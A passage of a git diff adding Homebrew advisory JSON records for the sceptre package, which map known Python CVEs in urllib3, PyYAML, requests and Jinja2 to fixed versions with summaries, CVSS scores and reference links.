"fixed", + "upstream_fixed_in": "1.18.1", + "resource": "urllib3", + "resource_purl": "pkg:pypi/urllib3@2.7.0" + } + } + ], + "database_specific": { + "source": "matched", + "strategy": "registry", + "confidence": "high", + "upstream_evidence": [ + { + "strategy": "registry", + "ecosystem": "PyPI", + "name": "urllib3", + "subject_version": "2.7.0", + "key": "pkg:pypi/urllib3@2.7.0", + "resource": "urllib3" + }, + { + "strategy": "registry", + "ecosystem": "PyPI", + "name": "urllib3", + "subject_version": "2.7.0", + "key": "pkg:pypi/urllib3@2.7.0", + "resource": "urllib3" + } + ] + }, + "summary": "Urllib3 Incorrect Certificate Validation", + "details": "Versions 1.17 and 1.18 of the Python urllib3 library suffer from a vulnerability that can cause them, in certain configurations, to not correctly validate TLS certificates. This places users of the library with those configurations at risk of man-in-the-middle and information leakage attacks. This vulnerability affects users using versions 1.17 and 1.18 of the urllib3 library, who are using the optional PyOpenSSL support for TLS instead of the regular standard library TLS backend, and who are using OpenSSL 1.1.0 via PyOpenSSL. This is an extremely uncommon configuration, so the security impact of this vulnerability is low.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:N/A:N" + }, + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N" + } + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2016-9015" + }, + { + "type": "WEB", + "url": "https://github.com/urllib3/urllib3/commit/c32cdbc16a9634fa0f8c829d1270301570158715" + }, + { + "type": "WEB", + "url": "https://github.com/pypa/advisory-database/tree/main/vulns/urllib3/PYSEC-2017-98.yaml" + }, + { + "type": "PACKAGE", + "url": "https://github.com/urllib3/urllib3" + }, + { + "type": "WEB", + "url": "https://web.archive.org/web/20210123184150/http://www.securityfocus.com/bid/93941" + }, + { + "type": "WEB", + "url": "http://www.openwall.com/lists/oss-security/2016/10/27/6" + } + ] +} diff --git a/advisories/BREW-sceptre-CVE-2017-18342.json b/advisories/BREW-sceptre-CVE-2017-18342.json new file mode 100644 index 00000000000..d54c101e483 --- /dev/null +++ b/advisories/BREW-sceptre-CVE-2017-18342.json @@ -0,0 +1,129 @@ +{ + "schema_version": "1.7.3", + "id": "BREW-sceptre-CVE-2017-18342", + "published": "2026-08-13T17:34:18Z", + "modified": "2026-08-13T17:34:18Z", + "upstream": [ + "GHSA-rprw-h62v-c2w7", + "CVE-2017-18342", + "PYSEC-2018-49" + ], + "affected": [ + { + "package": { + "ecosystem": "Homebrew", + "name": "sceptre", + "purl": "pkg:brew/sceptre" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0" + }, + { + "fixed": "4.7.0_1" + } + ] + } + ], + "ecosystem_specific": { + "fix": "bump", + "range_state": "fixed", + "upstream_fixed_in": "5.1", + "resource": "pyyaml", + "resource_purl": "pkg:pypi/pyyaml@6.0.3" + } + } + ], + "database_specific": { + "source": "matched", + "strategy": "registry", + "confidence": "high", + "upstream_evidence": [ + { + "strategy": "registry", + "ecosystem": "PyPI", + "name": "pyyaml", + "subject_version": "6.0.3", + "key": "pkg:pypi/pyyaml@6.0.3", + "resource": "pyyaml" + }, + { + "strategy": "registry", + "ecosystem": "PyPI", + "name": "pyyaml", + "subject_version": "6.0.3", + "key": "pkg:pypi/pyyaml@6.0.3", + "resource": "pyyaml" + } + ] + }, + "summary": "PyYAML insecurely deserializes YAML strings leading to arbitrary code execution", + "details": "In PyYAML before 5.1, the `yaml.load()` API could execute arbitrary code. In other words, `yaml.safe_load` is not used.\n\nThis was intended to be fixed in 4.1, but due to [breaking changes](https://github.com/yaml/pyyaml/issues/192#issuecomment-401491470), 4.1 was yanked and 5.1 [contains](https://github.com/yaml/pyyaml/issues/207#issuecomment-472520007) the patch for CVE-2017-18342.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" + } + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2017-18342" + }, + { + "type": "WEB", + "url": "https://github.com/marshmallow-code/apispec/issues/278" + }, + { + "type": "WEB", + "url": "https://github.com/yaml/pyyaml/issues/193" + }, + { + "type": "WEB", + "url": "https://github.com/yaml/pyyaml/issues/207#issuecomment-472520007" + }, + { + "type": "WEB", + "url": "https://github.com/yaml/pyyaml/pull/74" + }, + { + "type": "WEB", + "url": "https://github.com/yaml/pyyaml/commit/7b68405c81db889f83c32846462b238ccae5be80" + }, + { + "type": "WEB", + "url": "https://github.com/pypa/advisory-database/tree/main/vulns/pyyaml/PYSEC-2018-49.yaml" + }, + { + "type": "PACKAGE", + "url": "https://github.com/yaml/pyyaml" + }, + { + "type": "WEB", + "url": "https://github.com/yaml/pyyaml/blob/master/CHANGES" + }, + { + "type": "WEB", + "url": "https://github.com/yaml/pyyaml/wiki/PyYAML-yaml.load(input)-Deprecation" + }, + { + "type": "WEB", + "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/JEX7IPV5P2QJITAMA5Z63GQCZA5I6NVZ" + }, + { + "type": "WEB", + "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/KSQQMRUQSXBSUXLCRD3TSZYQ7SEZRKCE" + }, + { + "type": "WEB", + "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/M6JCFGEIEOFMWWIXGHSELMKQDD4CV2BA" + }, + { + "type": "WEB", + "url": "https://security.gentoo.org/glsa/202003-45" + } + ] +} diff --git a/advisories/BREW-sceptre-CVE-2018-18074.json b/advisories/BREW-sceptre-CVE-2018-18074.json new file mode 100644 index 00000000000..5030d7788ee --- /dev/null +++ b/advisories/BREW-sceptre-CVE-2018-18074.json @@ -0,0 +1,125 @@ +{ + "schema_version": "1.7.3", + "id": "BREW-sceptre-CVE-2018-18074", + "published": "2026-08-13T17:34:18Z", + "modified": "2026-08-13T17:34:18Z", + "upstream": [ + "GHSA-x84v-xcm2-53pg", + "CVE-2018-18074", + "PYSEC-2018-28" + ], + "affected": [ + { + "package": { + "ecosystem": "Homebrew", + "name": "sceptre", + "purl": "pkg:brew/sceptre" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0" + }, + { + "fixed": "4.7.0_1" + } + ] + } + ], + "ecosystem_specific": { + "fix": "bump", + "range_state": "fixed", + "upstream_fixed_in": "2.20.0", + "resource": "requests", + "resource_purl": "pkg:pypi/requests@2.34.2" + } + } + ], + "database_specific": { + "source": "matched", + "strategy": "registry", + "confidence": "high", + "upstream_evidence": [ + { + "strategy": "registry", + "ecosystem": "PyPI", + "name": "requests", + "subject_version": "2.34.2", + "key": "pkg:pypi/requests@2.34.2", + "resource": "requests" + }, + { + "strategy": "registry", + "ecosystem": "PyPI", + "name": "requests", + "subject_version": "2.34.2", + "key": "pkg:pypi/requests@2.34.2", + "resource": "requests" + } + ] + }, + "summary": "Insufficiently Protected Credentials in Requests", + "details": "The Requests package through 2.19.1 before 2018-09-14 for Python sends an HTTP Authorization header to an http URI upon receiving a same-hostname https-to-http redirect, which makes it easier for remote attackers to discover credentials by sniffing the network.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N" + } + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2018-18074" + }, + { + "type": "WEB", + "url": "https://github.com/requests/requests/issues/4716" + }, + { + "type": "WEB", + "url": "https://github.com/requests/requests/pull/4718" + }, + { + "type": "WEB", + "url": "https://github.com/requests/requests/commit/c45d7c49ea75133e52ab22a8e9e13173938e36ff" + }, + { + "type": "WEB", + "url": "https://access.redhat.com/errata/RHSA-2019:2035" + }, + { + "type": "WEB", + "url": "https://bugs.debian.org/910766" + }, + { + "type": "WEB", + "url": "https://github.com/pypa/advisory-database/tree/main/vulns/requests/PYSEC-2018-28.yaml" + }, + { + "type": "PACKAGE", + "url": "https://github.com/requests/requests" + }, + { + "type": "WEB", + "url": "https://usn.ubuntu.com/3790-1" + }, + { + "type": "WEB", + "url": "https://usn.ubuntu.com/3790-2" + }, + { + "type": "WEB", + "url": "https://www.oracle.com/security-alerts/cpujul2022.html" + }, + { + "type": "WEB", + "url": "http://docs.python-requests.org/en/master/community/updates/#release-and-version-history" + }, + { + "type": "WEB", + "url": "http://lists.opensuse.org/opensuse-security-announce/2019-07/msg00024.html" + } + ] +} diff --git a/advisories/BREW-sceptre-CVE-2018-20060.json b/advisories/BREW-sceptre-CVE-2018-20060.json new file mode 100644 index 00000000000..952dd1d3cf2 --- /dev/null +++ b/advisories/BREW-sceptre-CVE-2018-20060.json @@ -0,0 +1,141 @@ +{ + "schema_version": "1.7.3", + "id": "BREW-sceptre-CVE-2018-20060", + "published": "2026-08-13T17:34:18Z", + "modified": "2026-08-13T17:34:18Z", + "upstream": [ + "GHSA-www2-v7xj-xrc6", + "CVE-2018-20060", + "PYSEC-2018-32" + ], + "affected": [ + { + "package": { + "ecosystem": "Homebrew", + "name": "sceptre", + "purl": "pkg:brew/sceptre" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0" + }, + { + "fixed": "4.7.0_1" + } + ] + } + ], + "ecosystem_specific": { + "fix": "bump", + "range_state": "fixed", + "upstream_fixed_in": "1.23", + "resource": "urllib3", + "resource_purl": "pkg:pypi/urllib3@2.7.0" + } + } + ], + "database_specific": { + "source": "matched", + "strategy": "registry", + "confidence": "high", + "upstream_evidence": [ + { + "strategy": "registry", + "ecosystem": "PyPI", + "name": "urllib3", + "subject_version": "2.7.0", + "key": "pkg:pypi/urllib3@2.7.0", + "resource": "urllib3" + }, + { + "strategy": "registry", + "ecosystem": "PyPI", + "name": "urllib3", + "subject_version": "2.7.0", + "key": "pkg:pypi/urllib3@2.7.0", + "resource": "urllib3" + } + ] + }, + "summary": "Exposure of Sensitive Information to an Unauthorized Actor in urllib3", + "details": "urllib3 before version 1.23 does not remove the Authorization HTTP header when following a cross-origin redirect (i.e., a redirect that differs in host, port, or scheme). This can allow for credentials in the Authorization header to be exposed to unintended hosts or transmitted in cleartext.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" + }, + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N" + } + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2018-20060" + }, + { + "type": "WEB", + "url": "https://github.com/urllib3/urllib3/issues/1316" + }, + { + "type": "WEB", + "url": "https://github.com/urllib3/urllib3/pull/1346" + }, + { + "type": "WEB", + "url": "https://github.com/urllib3/urllib3/commit/560bd227b90f74417ffaedebf5f8d05a8ee4f532" + }, + { + "type": "WEB", + "url": "https://usn.ubuntu.com/3990-1" + }, + { + "type": "WEB", + "url": "https://security.netapp.com/advisory/ntap-20241227-0010" + }, + { + "type": "WEB", + "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/XWP36YW3KSVLXDBY3QJKDYEPCIMN3VQZ" + }, + { + "type": "WEB", + "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/BXLAXHM3Z6DUCXZ7ZXZ2EAYJXWDCZFCT" + }, + { + "type": "WEB", + "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/5SJERZEJDSUYQP7BNBXMBHRHGY26HRZD" + }, + { + "type": "WEB", + "url": "https://lists.debian.org/debian-lts-announce/2021/06/msg00015.html" + }, + { + "type": "WEB", + "url": "https://github.com/urllib3/urllib3/blob/master/CHANGES.rst" + }, + { + "type": "PACKAGE", + "url": "https://github.com/urllib3/urllib3" + }, + { + "type": "WEB", + "url": "https://github.com/pypa/advisory-database/tree/main/vulns/urllib3/PYSEC-2018-32.yaml" + }, + { + "type": "WEB", + "url": "https://bugzilla.redhat.com/show_bug.cgi?id=1649153" + }, + { + "type": "WEB", + "url": "https://access.redhat.com/errata/RHSA-2019:2272" + }, + { + "type": "WEB", + "url": "http://lists.opensuse.org/opensuse-security-announce/2019-09/msg00039.html" + } + ] +} diff --git a/advisories/BREW-sceptre-CVE-2018-25091.json b/advisories/BREW-sceptre-CVE-2018-25091.json new file mode 100644 index 00000000000..45b1ac782bb --- /dev/null +++ b/advisories/BREW-sceptre-CVE-2018-25091.json @@ -0,0 +1,101 @@ +{ + "schema_version": "1.7.3", + "id": "BREW-sceptre-CVE-2018-25091", + "published": "2026-08-13T17:34:18Z", + "modified": "2026-08-13T17:34:18Z", + "upstream": [ + "GHSA-gwvm-45gx-3cf8", + "CVE-2018-25091", + "PYSEC-2023-207" + ], + "affected": [ + { + "package": { + "ecosystem": "Homebrew", + "name": "sceptre", + "purl": "pkg:brew/sceptre" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0" + }, + { + "fixed": "4.7.0_1" + } + ] + } + ], + "ecosystem_specific": { + "fix": "bump", + "range_state": "fixed", + "upstream_fixed_in": "1.24.2", + "resource": "urllib3", + "resource_purl": "pkg:pypi/urllib3@2.7.0" + } + } + ], + "database_specific": { + "source": "matched", + "strategy": "registry", + "confidence": "high", + "upstream_evidence": [ + { + "strategy": "registry", + "ecosystem": "PyPI", + "name": "urllib3", + "subject_version": "2.7.0", + "key": "pkg:pypi/urllib3@2.7.0", + "resource": "urllib3" + }, + { + "strategy": "registry", + "ecosystem": "PyPI", + "name": "urllib3", + "subject_version": "2.7.0", + "key": "pkg:pypi/urllib3@2.7.0", + "resource": "urllib3" + } + ] + }, + "summary": "Authorization Header forwarded on redirect", + "details": "urllib3 before 1.24.2 does not remove the authorization HTTP header when following a cross-origin redirect (i.e., a redirect that differs in host, port, or scheme). This can allow for credentials in the authorization header to be exposed to unintended hosts or transmitted in cleartext. NOTE: this issue exists because of an incomplete fix for CVE-2018-20060 (which was case-sensitive).", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N" + }, + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:P/VC:N/VI:N/VA:N/SC:L/SI:L/SA:N" + } + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2018-25091" + }, + { + "type": "WEB", + "url": "https://github.com/urllib3/urllib3/issues/1510" + }, + { + "type": "WEB", + "url": "https://github.com/urllib3/urllib3/commit/adb358f8e06865406d1f05e581a16cbea2136fbc" + }, + { + "type": "WEB", + "url": "https://github.com/pypa/advisory-database/tree/main/vulns/urllib3/PYSEC-2023-207.yaml" + }, + { + "type": "PACKAGE", + "url": "https://github.com/urllib3/urllib3" + }, + { + "type": "WEB", + "url": "https://github.com/urllib3/urllib3/compare/1.24.1...1.24.2" + } + ] +} diff --git a/advisories/BREW-sceptre-CVE-2019-10906.json b/advisories/BREW-sceptre-CVE-2019-10906.json new file mode 100644 index 00000000000..83e9bd00542 --- /dev/null +++ b/advisories/BREW-sceptre-CVE-2019-10906.json @@ -0,0 +1,169 @@ +{ + "schema_version": "1.7.3", + "id": "BREW-sceptre-CVE-2019-10906", + "published": "2026-08-13T17:34:18Z", + "modified": "2026-08-13T17:34:18Z", + "upstream": [ + "GHSA-462w-v97r-4m45", + "CVE-2019-10906", + "PYSEC-2019-217" + ], + "affected": [ + { + "package": { + "ecosystem": "Homebrew", + "name": "sceptre", + "purl": "pkg:brew/sceptre" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0" + }, + { + "fixed": "4.7.0_1" + } + ] + } + ], + "ecosystem_specific": { + "fix": "bump", + "range_state": "fixed", + "upstream_fixed_in": "2.10.1", + "resource": "jinja2", + "resource_purl": "pkg:pypi/jinja2@3.1.6" + } + } + ], + "database_specific": { + "source": "matched", + "strategy": "registry", + "confidence": "high", + "upstream_evidence": [ + { + "strategy": "registry", + "ecosystem": "PyPI", + "name": "jinja2", + "subject_version": "3.1.6", + "key": "pkg:pypi/jinja2@3.1.6", + "resource": "jinja2" + }, + { + "strategy": "registry", + "ecosystem": "PyPI", + "name": "jinja2", + "subject_version": "3.1.6", + "key": "pkg:pypi/jinja2@3.1.6", + "resource": "jinja2" + } + ] + }, + "summary": "Jinja2 sandbox escape via string formatting", + "details": "In Pallets Jinja before 2.10.1, `str.format_map` allows a sandbox escape.\n\nThe sandbox is used to restrict what code can be evaluated when rendering untrusted, user-provided templates. Due to the way string formatting works in Python, the `str.format_map` method could be used to escape the sandbox.\n\nThis issue was previously addressed for the `str.format` method in Jinja 2.8.1, which discusses the issue in detail. However, the less-common `str.format_map` method was overlooked. This release applies the same sandboxing to both methods.\n\nIf you cannot upgrade Jinja, you can override the `is_safe_attribute` method on the sandbox and explicitly disallow the `format_map` method on string objects.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N" + }, + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:N/SC:H/SI:N/SA:N" + } + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2019-10906" + }, + { + "type": "WEB", + "url": "https://usn.ubuntu.com/4011-2" + }, + { + "type": "WEB", + "url": "https://usn.ubuntu.com/4011-1" + }, + { + "type": "WEB", + "url": "https://palletsprojects.com/blog/jinja-2-10-1-released" + }, + { + "type": "WEB", + "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/TS7IVZAJBWOHNRDMFJDIZVFCMRP6YIUQ" + }, + { + "type": "WEB", + "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/QCDYIS254EJMBNWOG4S5QY6AOTOR4TZU" + }, + { + "type": "WEB", + "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/DSW3QZMFVVR7YE3UT4YRQA272TYAL5AF" + }, + { + "type": "WEB", + "url": "https://lists.apache.org/thread.html/f0c4a03418bcfe70c539c5dbaf99c04c98da13bfa1d3266f08564316@%3Ccommits.airflow.apache.org%3E" + }, + { + "type": "WEB", + "url": "https://lists.apache.org/thread.html/b2380d147b508bbcb90d2cad443c159e63e12555966ab4f320ee22da@%3Ccommits.airflow.apache.org%3E" + }, + { + "type": "WEB", + "url": "https://lists.apache.org/thread.html/7f39f01392d320dfb48e4901db68daeece62fd60ef20955966739993@%3Ccommits.airflow.apache.org%3E" + }, + { + "type": "WEB", + "url": "https://lists.apache.org/thread.html/57673a78c4d5c870d3f21465c7e2946b9f8285c7c57e54c2ae552f02@%3Ccommits.airflow.apache.org%3E" + }, + { + "type": "WEB", + "url": "https://lists.apache.org/thread.html/46c055e173b52d599c648a98199972dbd6a89d2b4c4647b0500f2284@%3Cdevnull.infra.apache.org%3E" + }, + { + "type": "WEB", + "url": "https://lists.apache.org/thread.html/320441dccbd9a545320f5f07306d711d4bbd31ba43dc9eebcfc602df@%3Cdevnull.infra.apache.org%3E" + }, + { + "type": "WEB", + "url": "https://lists.apache.org/thread.html/2b52b9c8b9d6366a4f1b407a8bde6af28d9fc73fdb3b37695fd0d9ac@%3Cdevnull.infra.apache.org%3E" + }, + { + "type": "WEB", + "url": "https://lists.apache.org/thread.html/09fc842ff444cd43d9d4c510756fec625ef8eb1175f14fd21de2605f@%3Cdevnull.infra.apache.org%3E" + }, + { + "type": "WEB", + "url": "https://github.com/pypa/advisory-database/tree/main/vulns/jinja2/PYSEC-2019-217.yaml" + }, + { + "type": "PACKAGE", + "url": "https://github.com/pallets/jinja" + }, + { + "type": "ADVISORY", + "url": "https://github.com/advisories/GHSA-462w-v97r-4m45" + }, + { + "type": "WEB", + "url": "https://access.redhat.com/errata/RHSA-2019:1329" + }, + { + "type": "WEB", + "url": "https://access.redhat.com/errata/RHSA-2019:1237" + }, + { + "type": "WEB", + "url": "https://access.redhat.com/errata/RHSA-2019:1152" + }, + { + "type": "WEB", + "url": "http://lists.opensuse.org/opensuse-security-announce/2019-05/msg00030.html" + }, + { + "type": "WEB", + "url": "http://lists.opensuse.org/opensuse-security-announce/2019-06/msg00064.html" + } + ] +} diff --git a/advisories/BREW-sceptre-CVE-2019-11236.json b/advisories/BREW-sceptre-CVE-2019-11236.json new file mode 100644 index 00000000000..a49b69340a0 --- /dev/null +++ b/advisories/BREW-sceptre-CVE-2019-11236.json @@ -0,0 +1,153 @@ +{ + "schema_version": "1.7.3", + "id": "BREW-sceptre-CVE-2019-11236", + "published": "2026-08-13T17:34:18Z", + "modified": "2026-08-13T17:34:18Z", + "upstream": [ + "GHSA-r64q-w8jr-g9qp", + "CVE-2019-11236", + "PYSEC-2019-132" + ], + "affected": [ + { + "package": { + "ecosystem": "Homebrew", + "name": "sceptre", + "purl": "pkg:brew/sceptre" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0" + }, + { + "fixed": "4.7.0_1" + } + ] + } + ], + "ecosystem_specific": { + "fix": "bump", + "range_state": "fixed", + "upstream_fixed_in": "1.24.3", + "resource": "urllib3", + "resource_purl": "pkg:pypi/urllib3@2.7.0" + } + } + ], + "database_specific": { + "source": "matched", + "strategy": "registry", + "confidence": "high", + "upstream_evidence": [ + { + "strategy": "registry", + "ecosystem": "PyPI", + "name": "urllib3", + "subject_version": "2.7.0", + "key": "pkg:pypi/urllib3@2.7.0", + "resource": "urllib3" + }, + { + "strategy": "registry", + "ecosystem": "PyPI", + "name": "urllib3", + "subject_version": "2.7.0", + "key": "pkg:pypi/urllib3@2.7.0", + "resource": "urllib3" + } + ] + }, + "summary": "Improper Neutralization of CRLF Sequences in urllib3 library for Python", + "details": "In the urllib3 library through 1.24.2 for Python, CRLF injection is possible if the attacker controls the request parameter.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N" + }, + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:P/VC:N/VI:N/VA:N/SC:L/SI:L/SA:N" + } + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2019-11236" + }, + { + "type": "WEB", + "url": "https://github.com/urllib3/urllib3/issues/1553" + }, + { + "type": "WEB", + "url": "https://usn.ubuntu.com/3990-2" + }, + { + "type": "WEB", + "url": "https://usn.ubuntu.com/3990-1" + }, + { + "type": "WEB", + "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/XOSA2NT4DUQDBEIWE6O7KKD24XND7TE2" + }, + { + "type": "WEB", + "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/TBI45HO533KYHNB5YRO43TBYKA3E3VRL" + }, + { + "type": "WEB", + "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/R62XGEYPUTXMRHGX5I37EBCGQ5COHGKR" + }, + { + "type": "WEB", + "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/NKGPJLVLVYCL4L4B4G5TIOTVK4BKPG72" + }, + { + "type": "WEB", + "url": "https://lists.debian.org/debian-lts-announce/2023/10/msg00012.html" + }, + { + "type": "WEB", + "url": "https://lists.debian.org/debian-lts-announce/2021/06/msg00015.html" + }, + { + "type": "WEB", + "url": "https://lists.debian.org/debian-lts-announce/2019/06/msg00016.html" + }, + { + "type": "PACKAGE", + "url": "https://github.com/urllib3/urllib3" + }, + { + "type": "WEB", + "url": "https://github.com/pypa/advisory-database/tree/main/vulns/urllib3/PYSEC-2019-132.yaml" + }, + { + "type": "ADVISORY", + "url": "https://github.com/advisories/GHSA-r64q-w8jr-g9qp" + }, + { + "type": "WEB", + "url": "https://access.redhat.com/errata/RHSA-2019:3590" + }, + { + "type": "WEB", + "url": "https://access.redhat.com/errata/RHSA-2019:3335" + }, + { + "type": "WEB", + "url": "https://access.redhat.com/errata/RHSA-2019:2272" + }, + { + "type": "WEB", + "url": "http://lists.opensuse.org/opensuse-security-announce/2019-09/msg00039.html" + }, + { + "type": "WEB", + "url": "http://lists.opensuse.org/opensuse-security-announce/2019-09/msg00041.html" + } + ] +} diff --git a/advisories/BREW-sceptre-CVE-2019-11324.json b/advisories/BREW-sceptre-CVE-2019-11324.json new file mode 100644 index 00000000000..5c2a5e0504b --- /dev/null +++ b/advisories/BREW-sceptre-CVE-2019-11324.json @@ -0,0 +1,145 @@ +{ + "schema_version": "1.7.3", + "id": "BREW-sceptre-CVE-2019-11324", + "published": "2026-08-13T17:34:18Z", + "modified": "2026-08-13T17:34:18Z", + "upstream": [ + "GHSA-mh33-7rrq-662w", + "CVE-2019-11324", + "PYSEC-2019-133" + ], + "affected": [ + { + "package": { + "ecosystem": "Homebrew", + "name": "sceptre", + "purl": "pkg:brew/sceptre" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0" + }, + { + "fixed": "4.7.0_1" + } + ] + } + ], + "ecosystem_specific": { + "fix": "bump", + "range_state": "fixed", + "upstream_fixed_in": "1.24.2", + "resource": "urllib3", + "resource_purl": "pkg:pypi/urllib3@2.7.0" + } + } + ], + "database_specific": { + "source": "matched", + "strategy": "registry", + "confidence": "high", + "upstream_evidence": [ + { + "strategy": "registry", + "ecosystem": "PyPI", + "name": "urllib3", + "subject_version": "2.7.0", + "key": "pkg:pypi/urllib3@2.7.0", + "resource": "urllib3" + }, + { + "strategy": "registry", + "ecosystem": "PyPI", + "name": "urllib3", + "subject_version": "2.7.0", + "key": "pkg:pypi/urllib3@2.7.0", + "resource": "urllib3" + } + ] + }, + "summary": "Improper Certificate Validation in urllib3", + "details": "The urllib3 library before 1.24.2 for Python mishandles certain cases where the desired set of CA certificates is different from the OS store of CA certificates, which results in SSL connections succeeding in situations where a verification failure is the correct outcome. This is related to use of the `ssl_context`, `ca_certs`, or `ca_certs_dir` argument.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N" + }, + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:H/VA:N/SC:N/SI:N/SA:N" + } + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2019-11324" + }, + { + "type": "WEB", + "url": "https://github.com/urllib3/urllib3/commit/1efadf43dc63317cd9eaa3e0fdb9e05ab07254b1" + }, + { + "type": "WEB", + "url": "https://access.redhat.com/errata/RHSA-2019:3335" + }, + { + "type": "WEB", + "url": "https://access.redhat.com/errata/RHSA-2019:3590" + }, + { + "type": "ADVISORY", + "url": "https://github.com/advisories/GHSA-mh33-7rrq-662w" + }, + { + "type": "WEB", + "url": "https://github.com/pypa/advisory-database/tree/main/vulns/urllib3/PYSEC-2019-133.yaml" + }, + { + "type": "PACKAGE", + "url": "https://github.com/urllib3/urllib3" + }, + { + "type": "WEB", + "url": "https://github.com/urllib3/urllib3/compare/a6ec68a...1efadf4" + }, + { + "type": "WEB", + "url": "https://lists.debian.org/debian-lts-announce/2021/06/msg00015.html" + }, + { + "type": "WEB", + "url": "https://lists.debian.org/debian-lts-announce/2023/10/msg00012.html" + }, + { + "type": "WEB", + "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/NKGPJLVLVYCL4L4B4G5TIOTVK4BKPG72" + }, + { + "type": "WEB", + "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/XOSA2NT4DUQDBEIWE6O7KKD24XND7TE2" + }, + { + "type": "WEB", + "url": "https://pypi.org/project/urllib3/1.24.2" + }, + { + "type": "WEB", + "url": "https://usn.ubuntu.com/3990-1" + }, + { + "type": "WEB", + "url": "http://lists.opensuse.org/opensuse-security-announce/2019-09/msg00039.html" + }, + { + "type": "WEB", + "url": "http://lists.opensuse.org/opensuse-security-announce/2019-09/msg00041.html" + }, + { + "type": "WEB", + "url": "http://www.openwall.com/lists/oss-security/2019/04/19/1" + } + ] +} diff --git a/advisories/BREW-sceptre-CVE-2019-20477.json b/advisories/BREW-sceptre-CVE-2019-20477.json new file mode 100644 index 00000000000..0a9d06ddda7 --- /dev/null +++ b/advisories/BREW-sceptre-CVE-2019-20477.json @@ -0,0 +1,109 @@ +{ + "schema_version": "1.7.3", + "id": "BREW-sceptre-CVE-2019-20477", + "published": "2026-08-13T17:34:18Z", + "modified": "2026-08-13T17:34:18Z", + "upstream": [ + "GHSA-3pqx-4fqf-j49f", + "CVE-2019-20477", + "PYSEC-2020-176" + ], + "affected": [ + { + "package": { + "ecosystem": "Homebrew", + "name": "sceptre", + "purl": "pkg:brew/sceptre" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0" + }, + { + "fixed": "4.7.0_1" + } + ] + } + ], + "ecosystem_specific": { + "fix": "bump", + "range_state": "fixed", + "upstream_fixed_in": "5.2", + "resource": "pyyaml", + "resource_purl": "pkg:pypi/pyyaml@6.0.3" + } + } + ], + "database_specific": { + "source": "matched", + "strategy": "registry", + "confidence": "high", + "upstream_evidence": [ + { + "strategy": "registry", + "ecosystem": "PyPI", + "name": "pyyaml", + "subject_version": "6.0.3", + 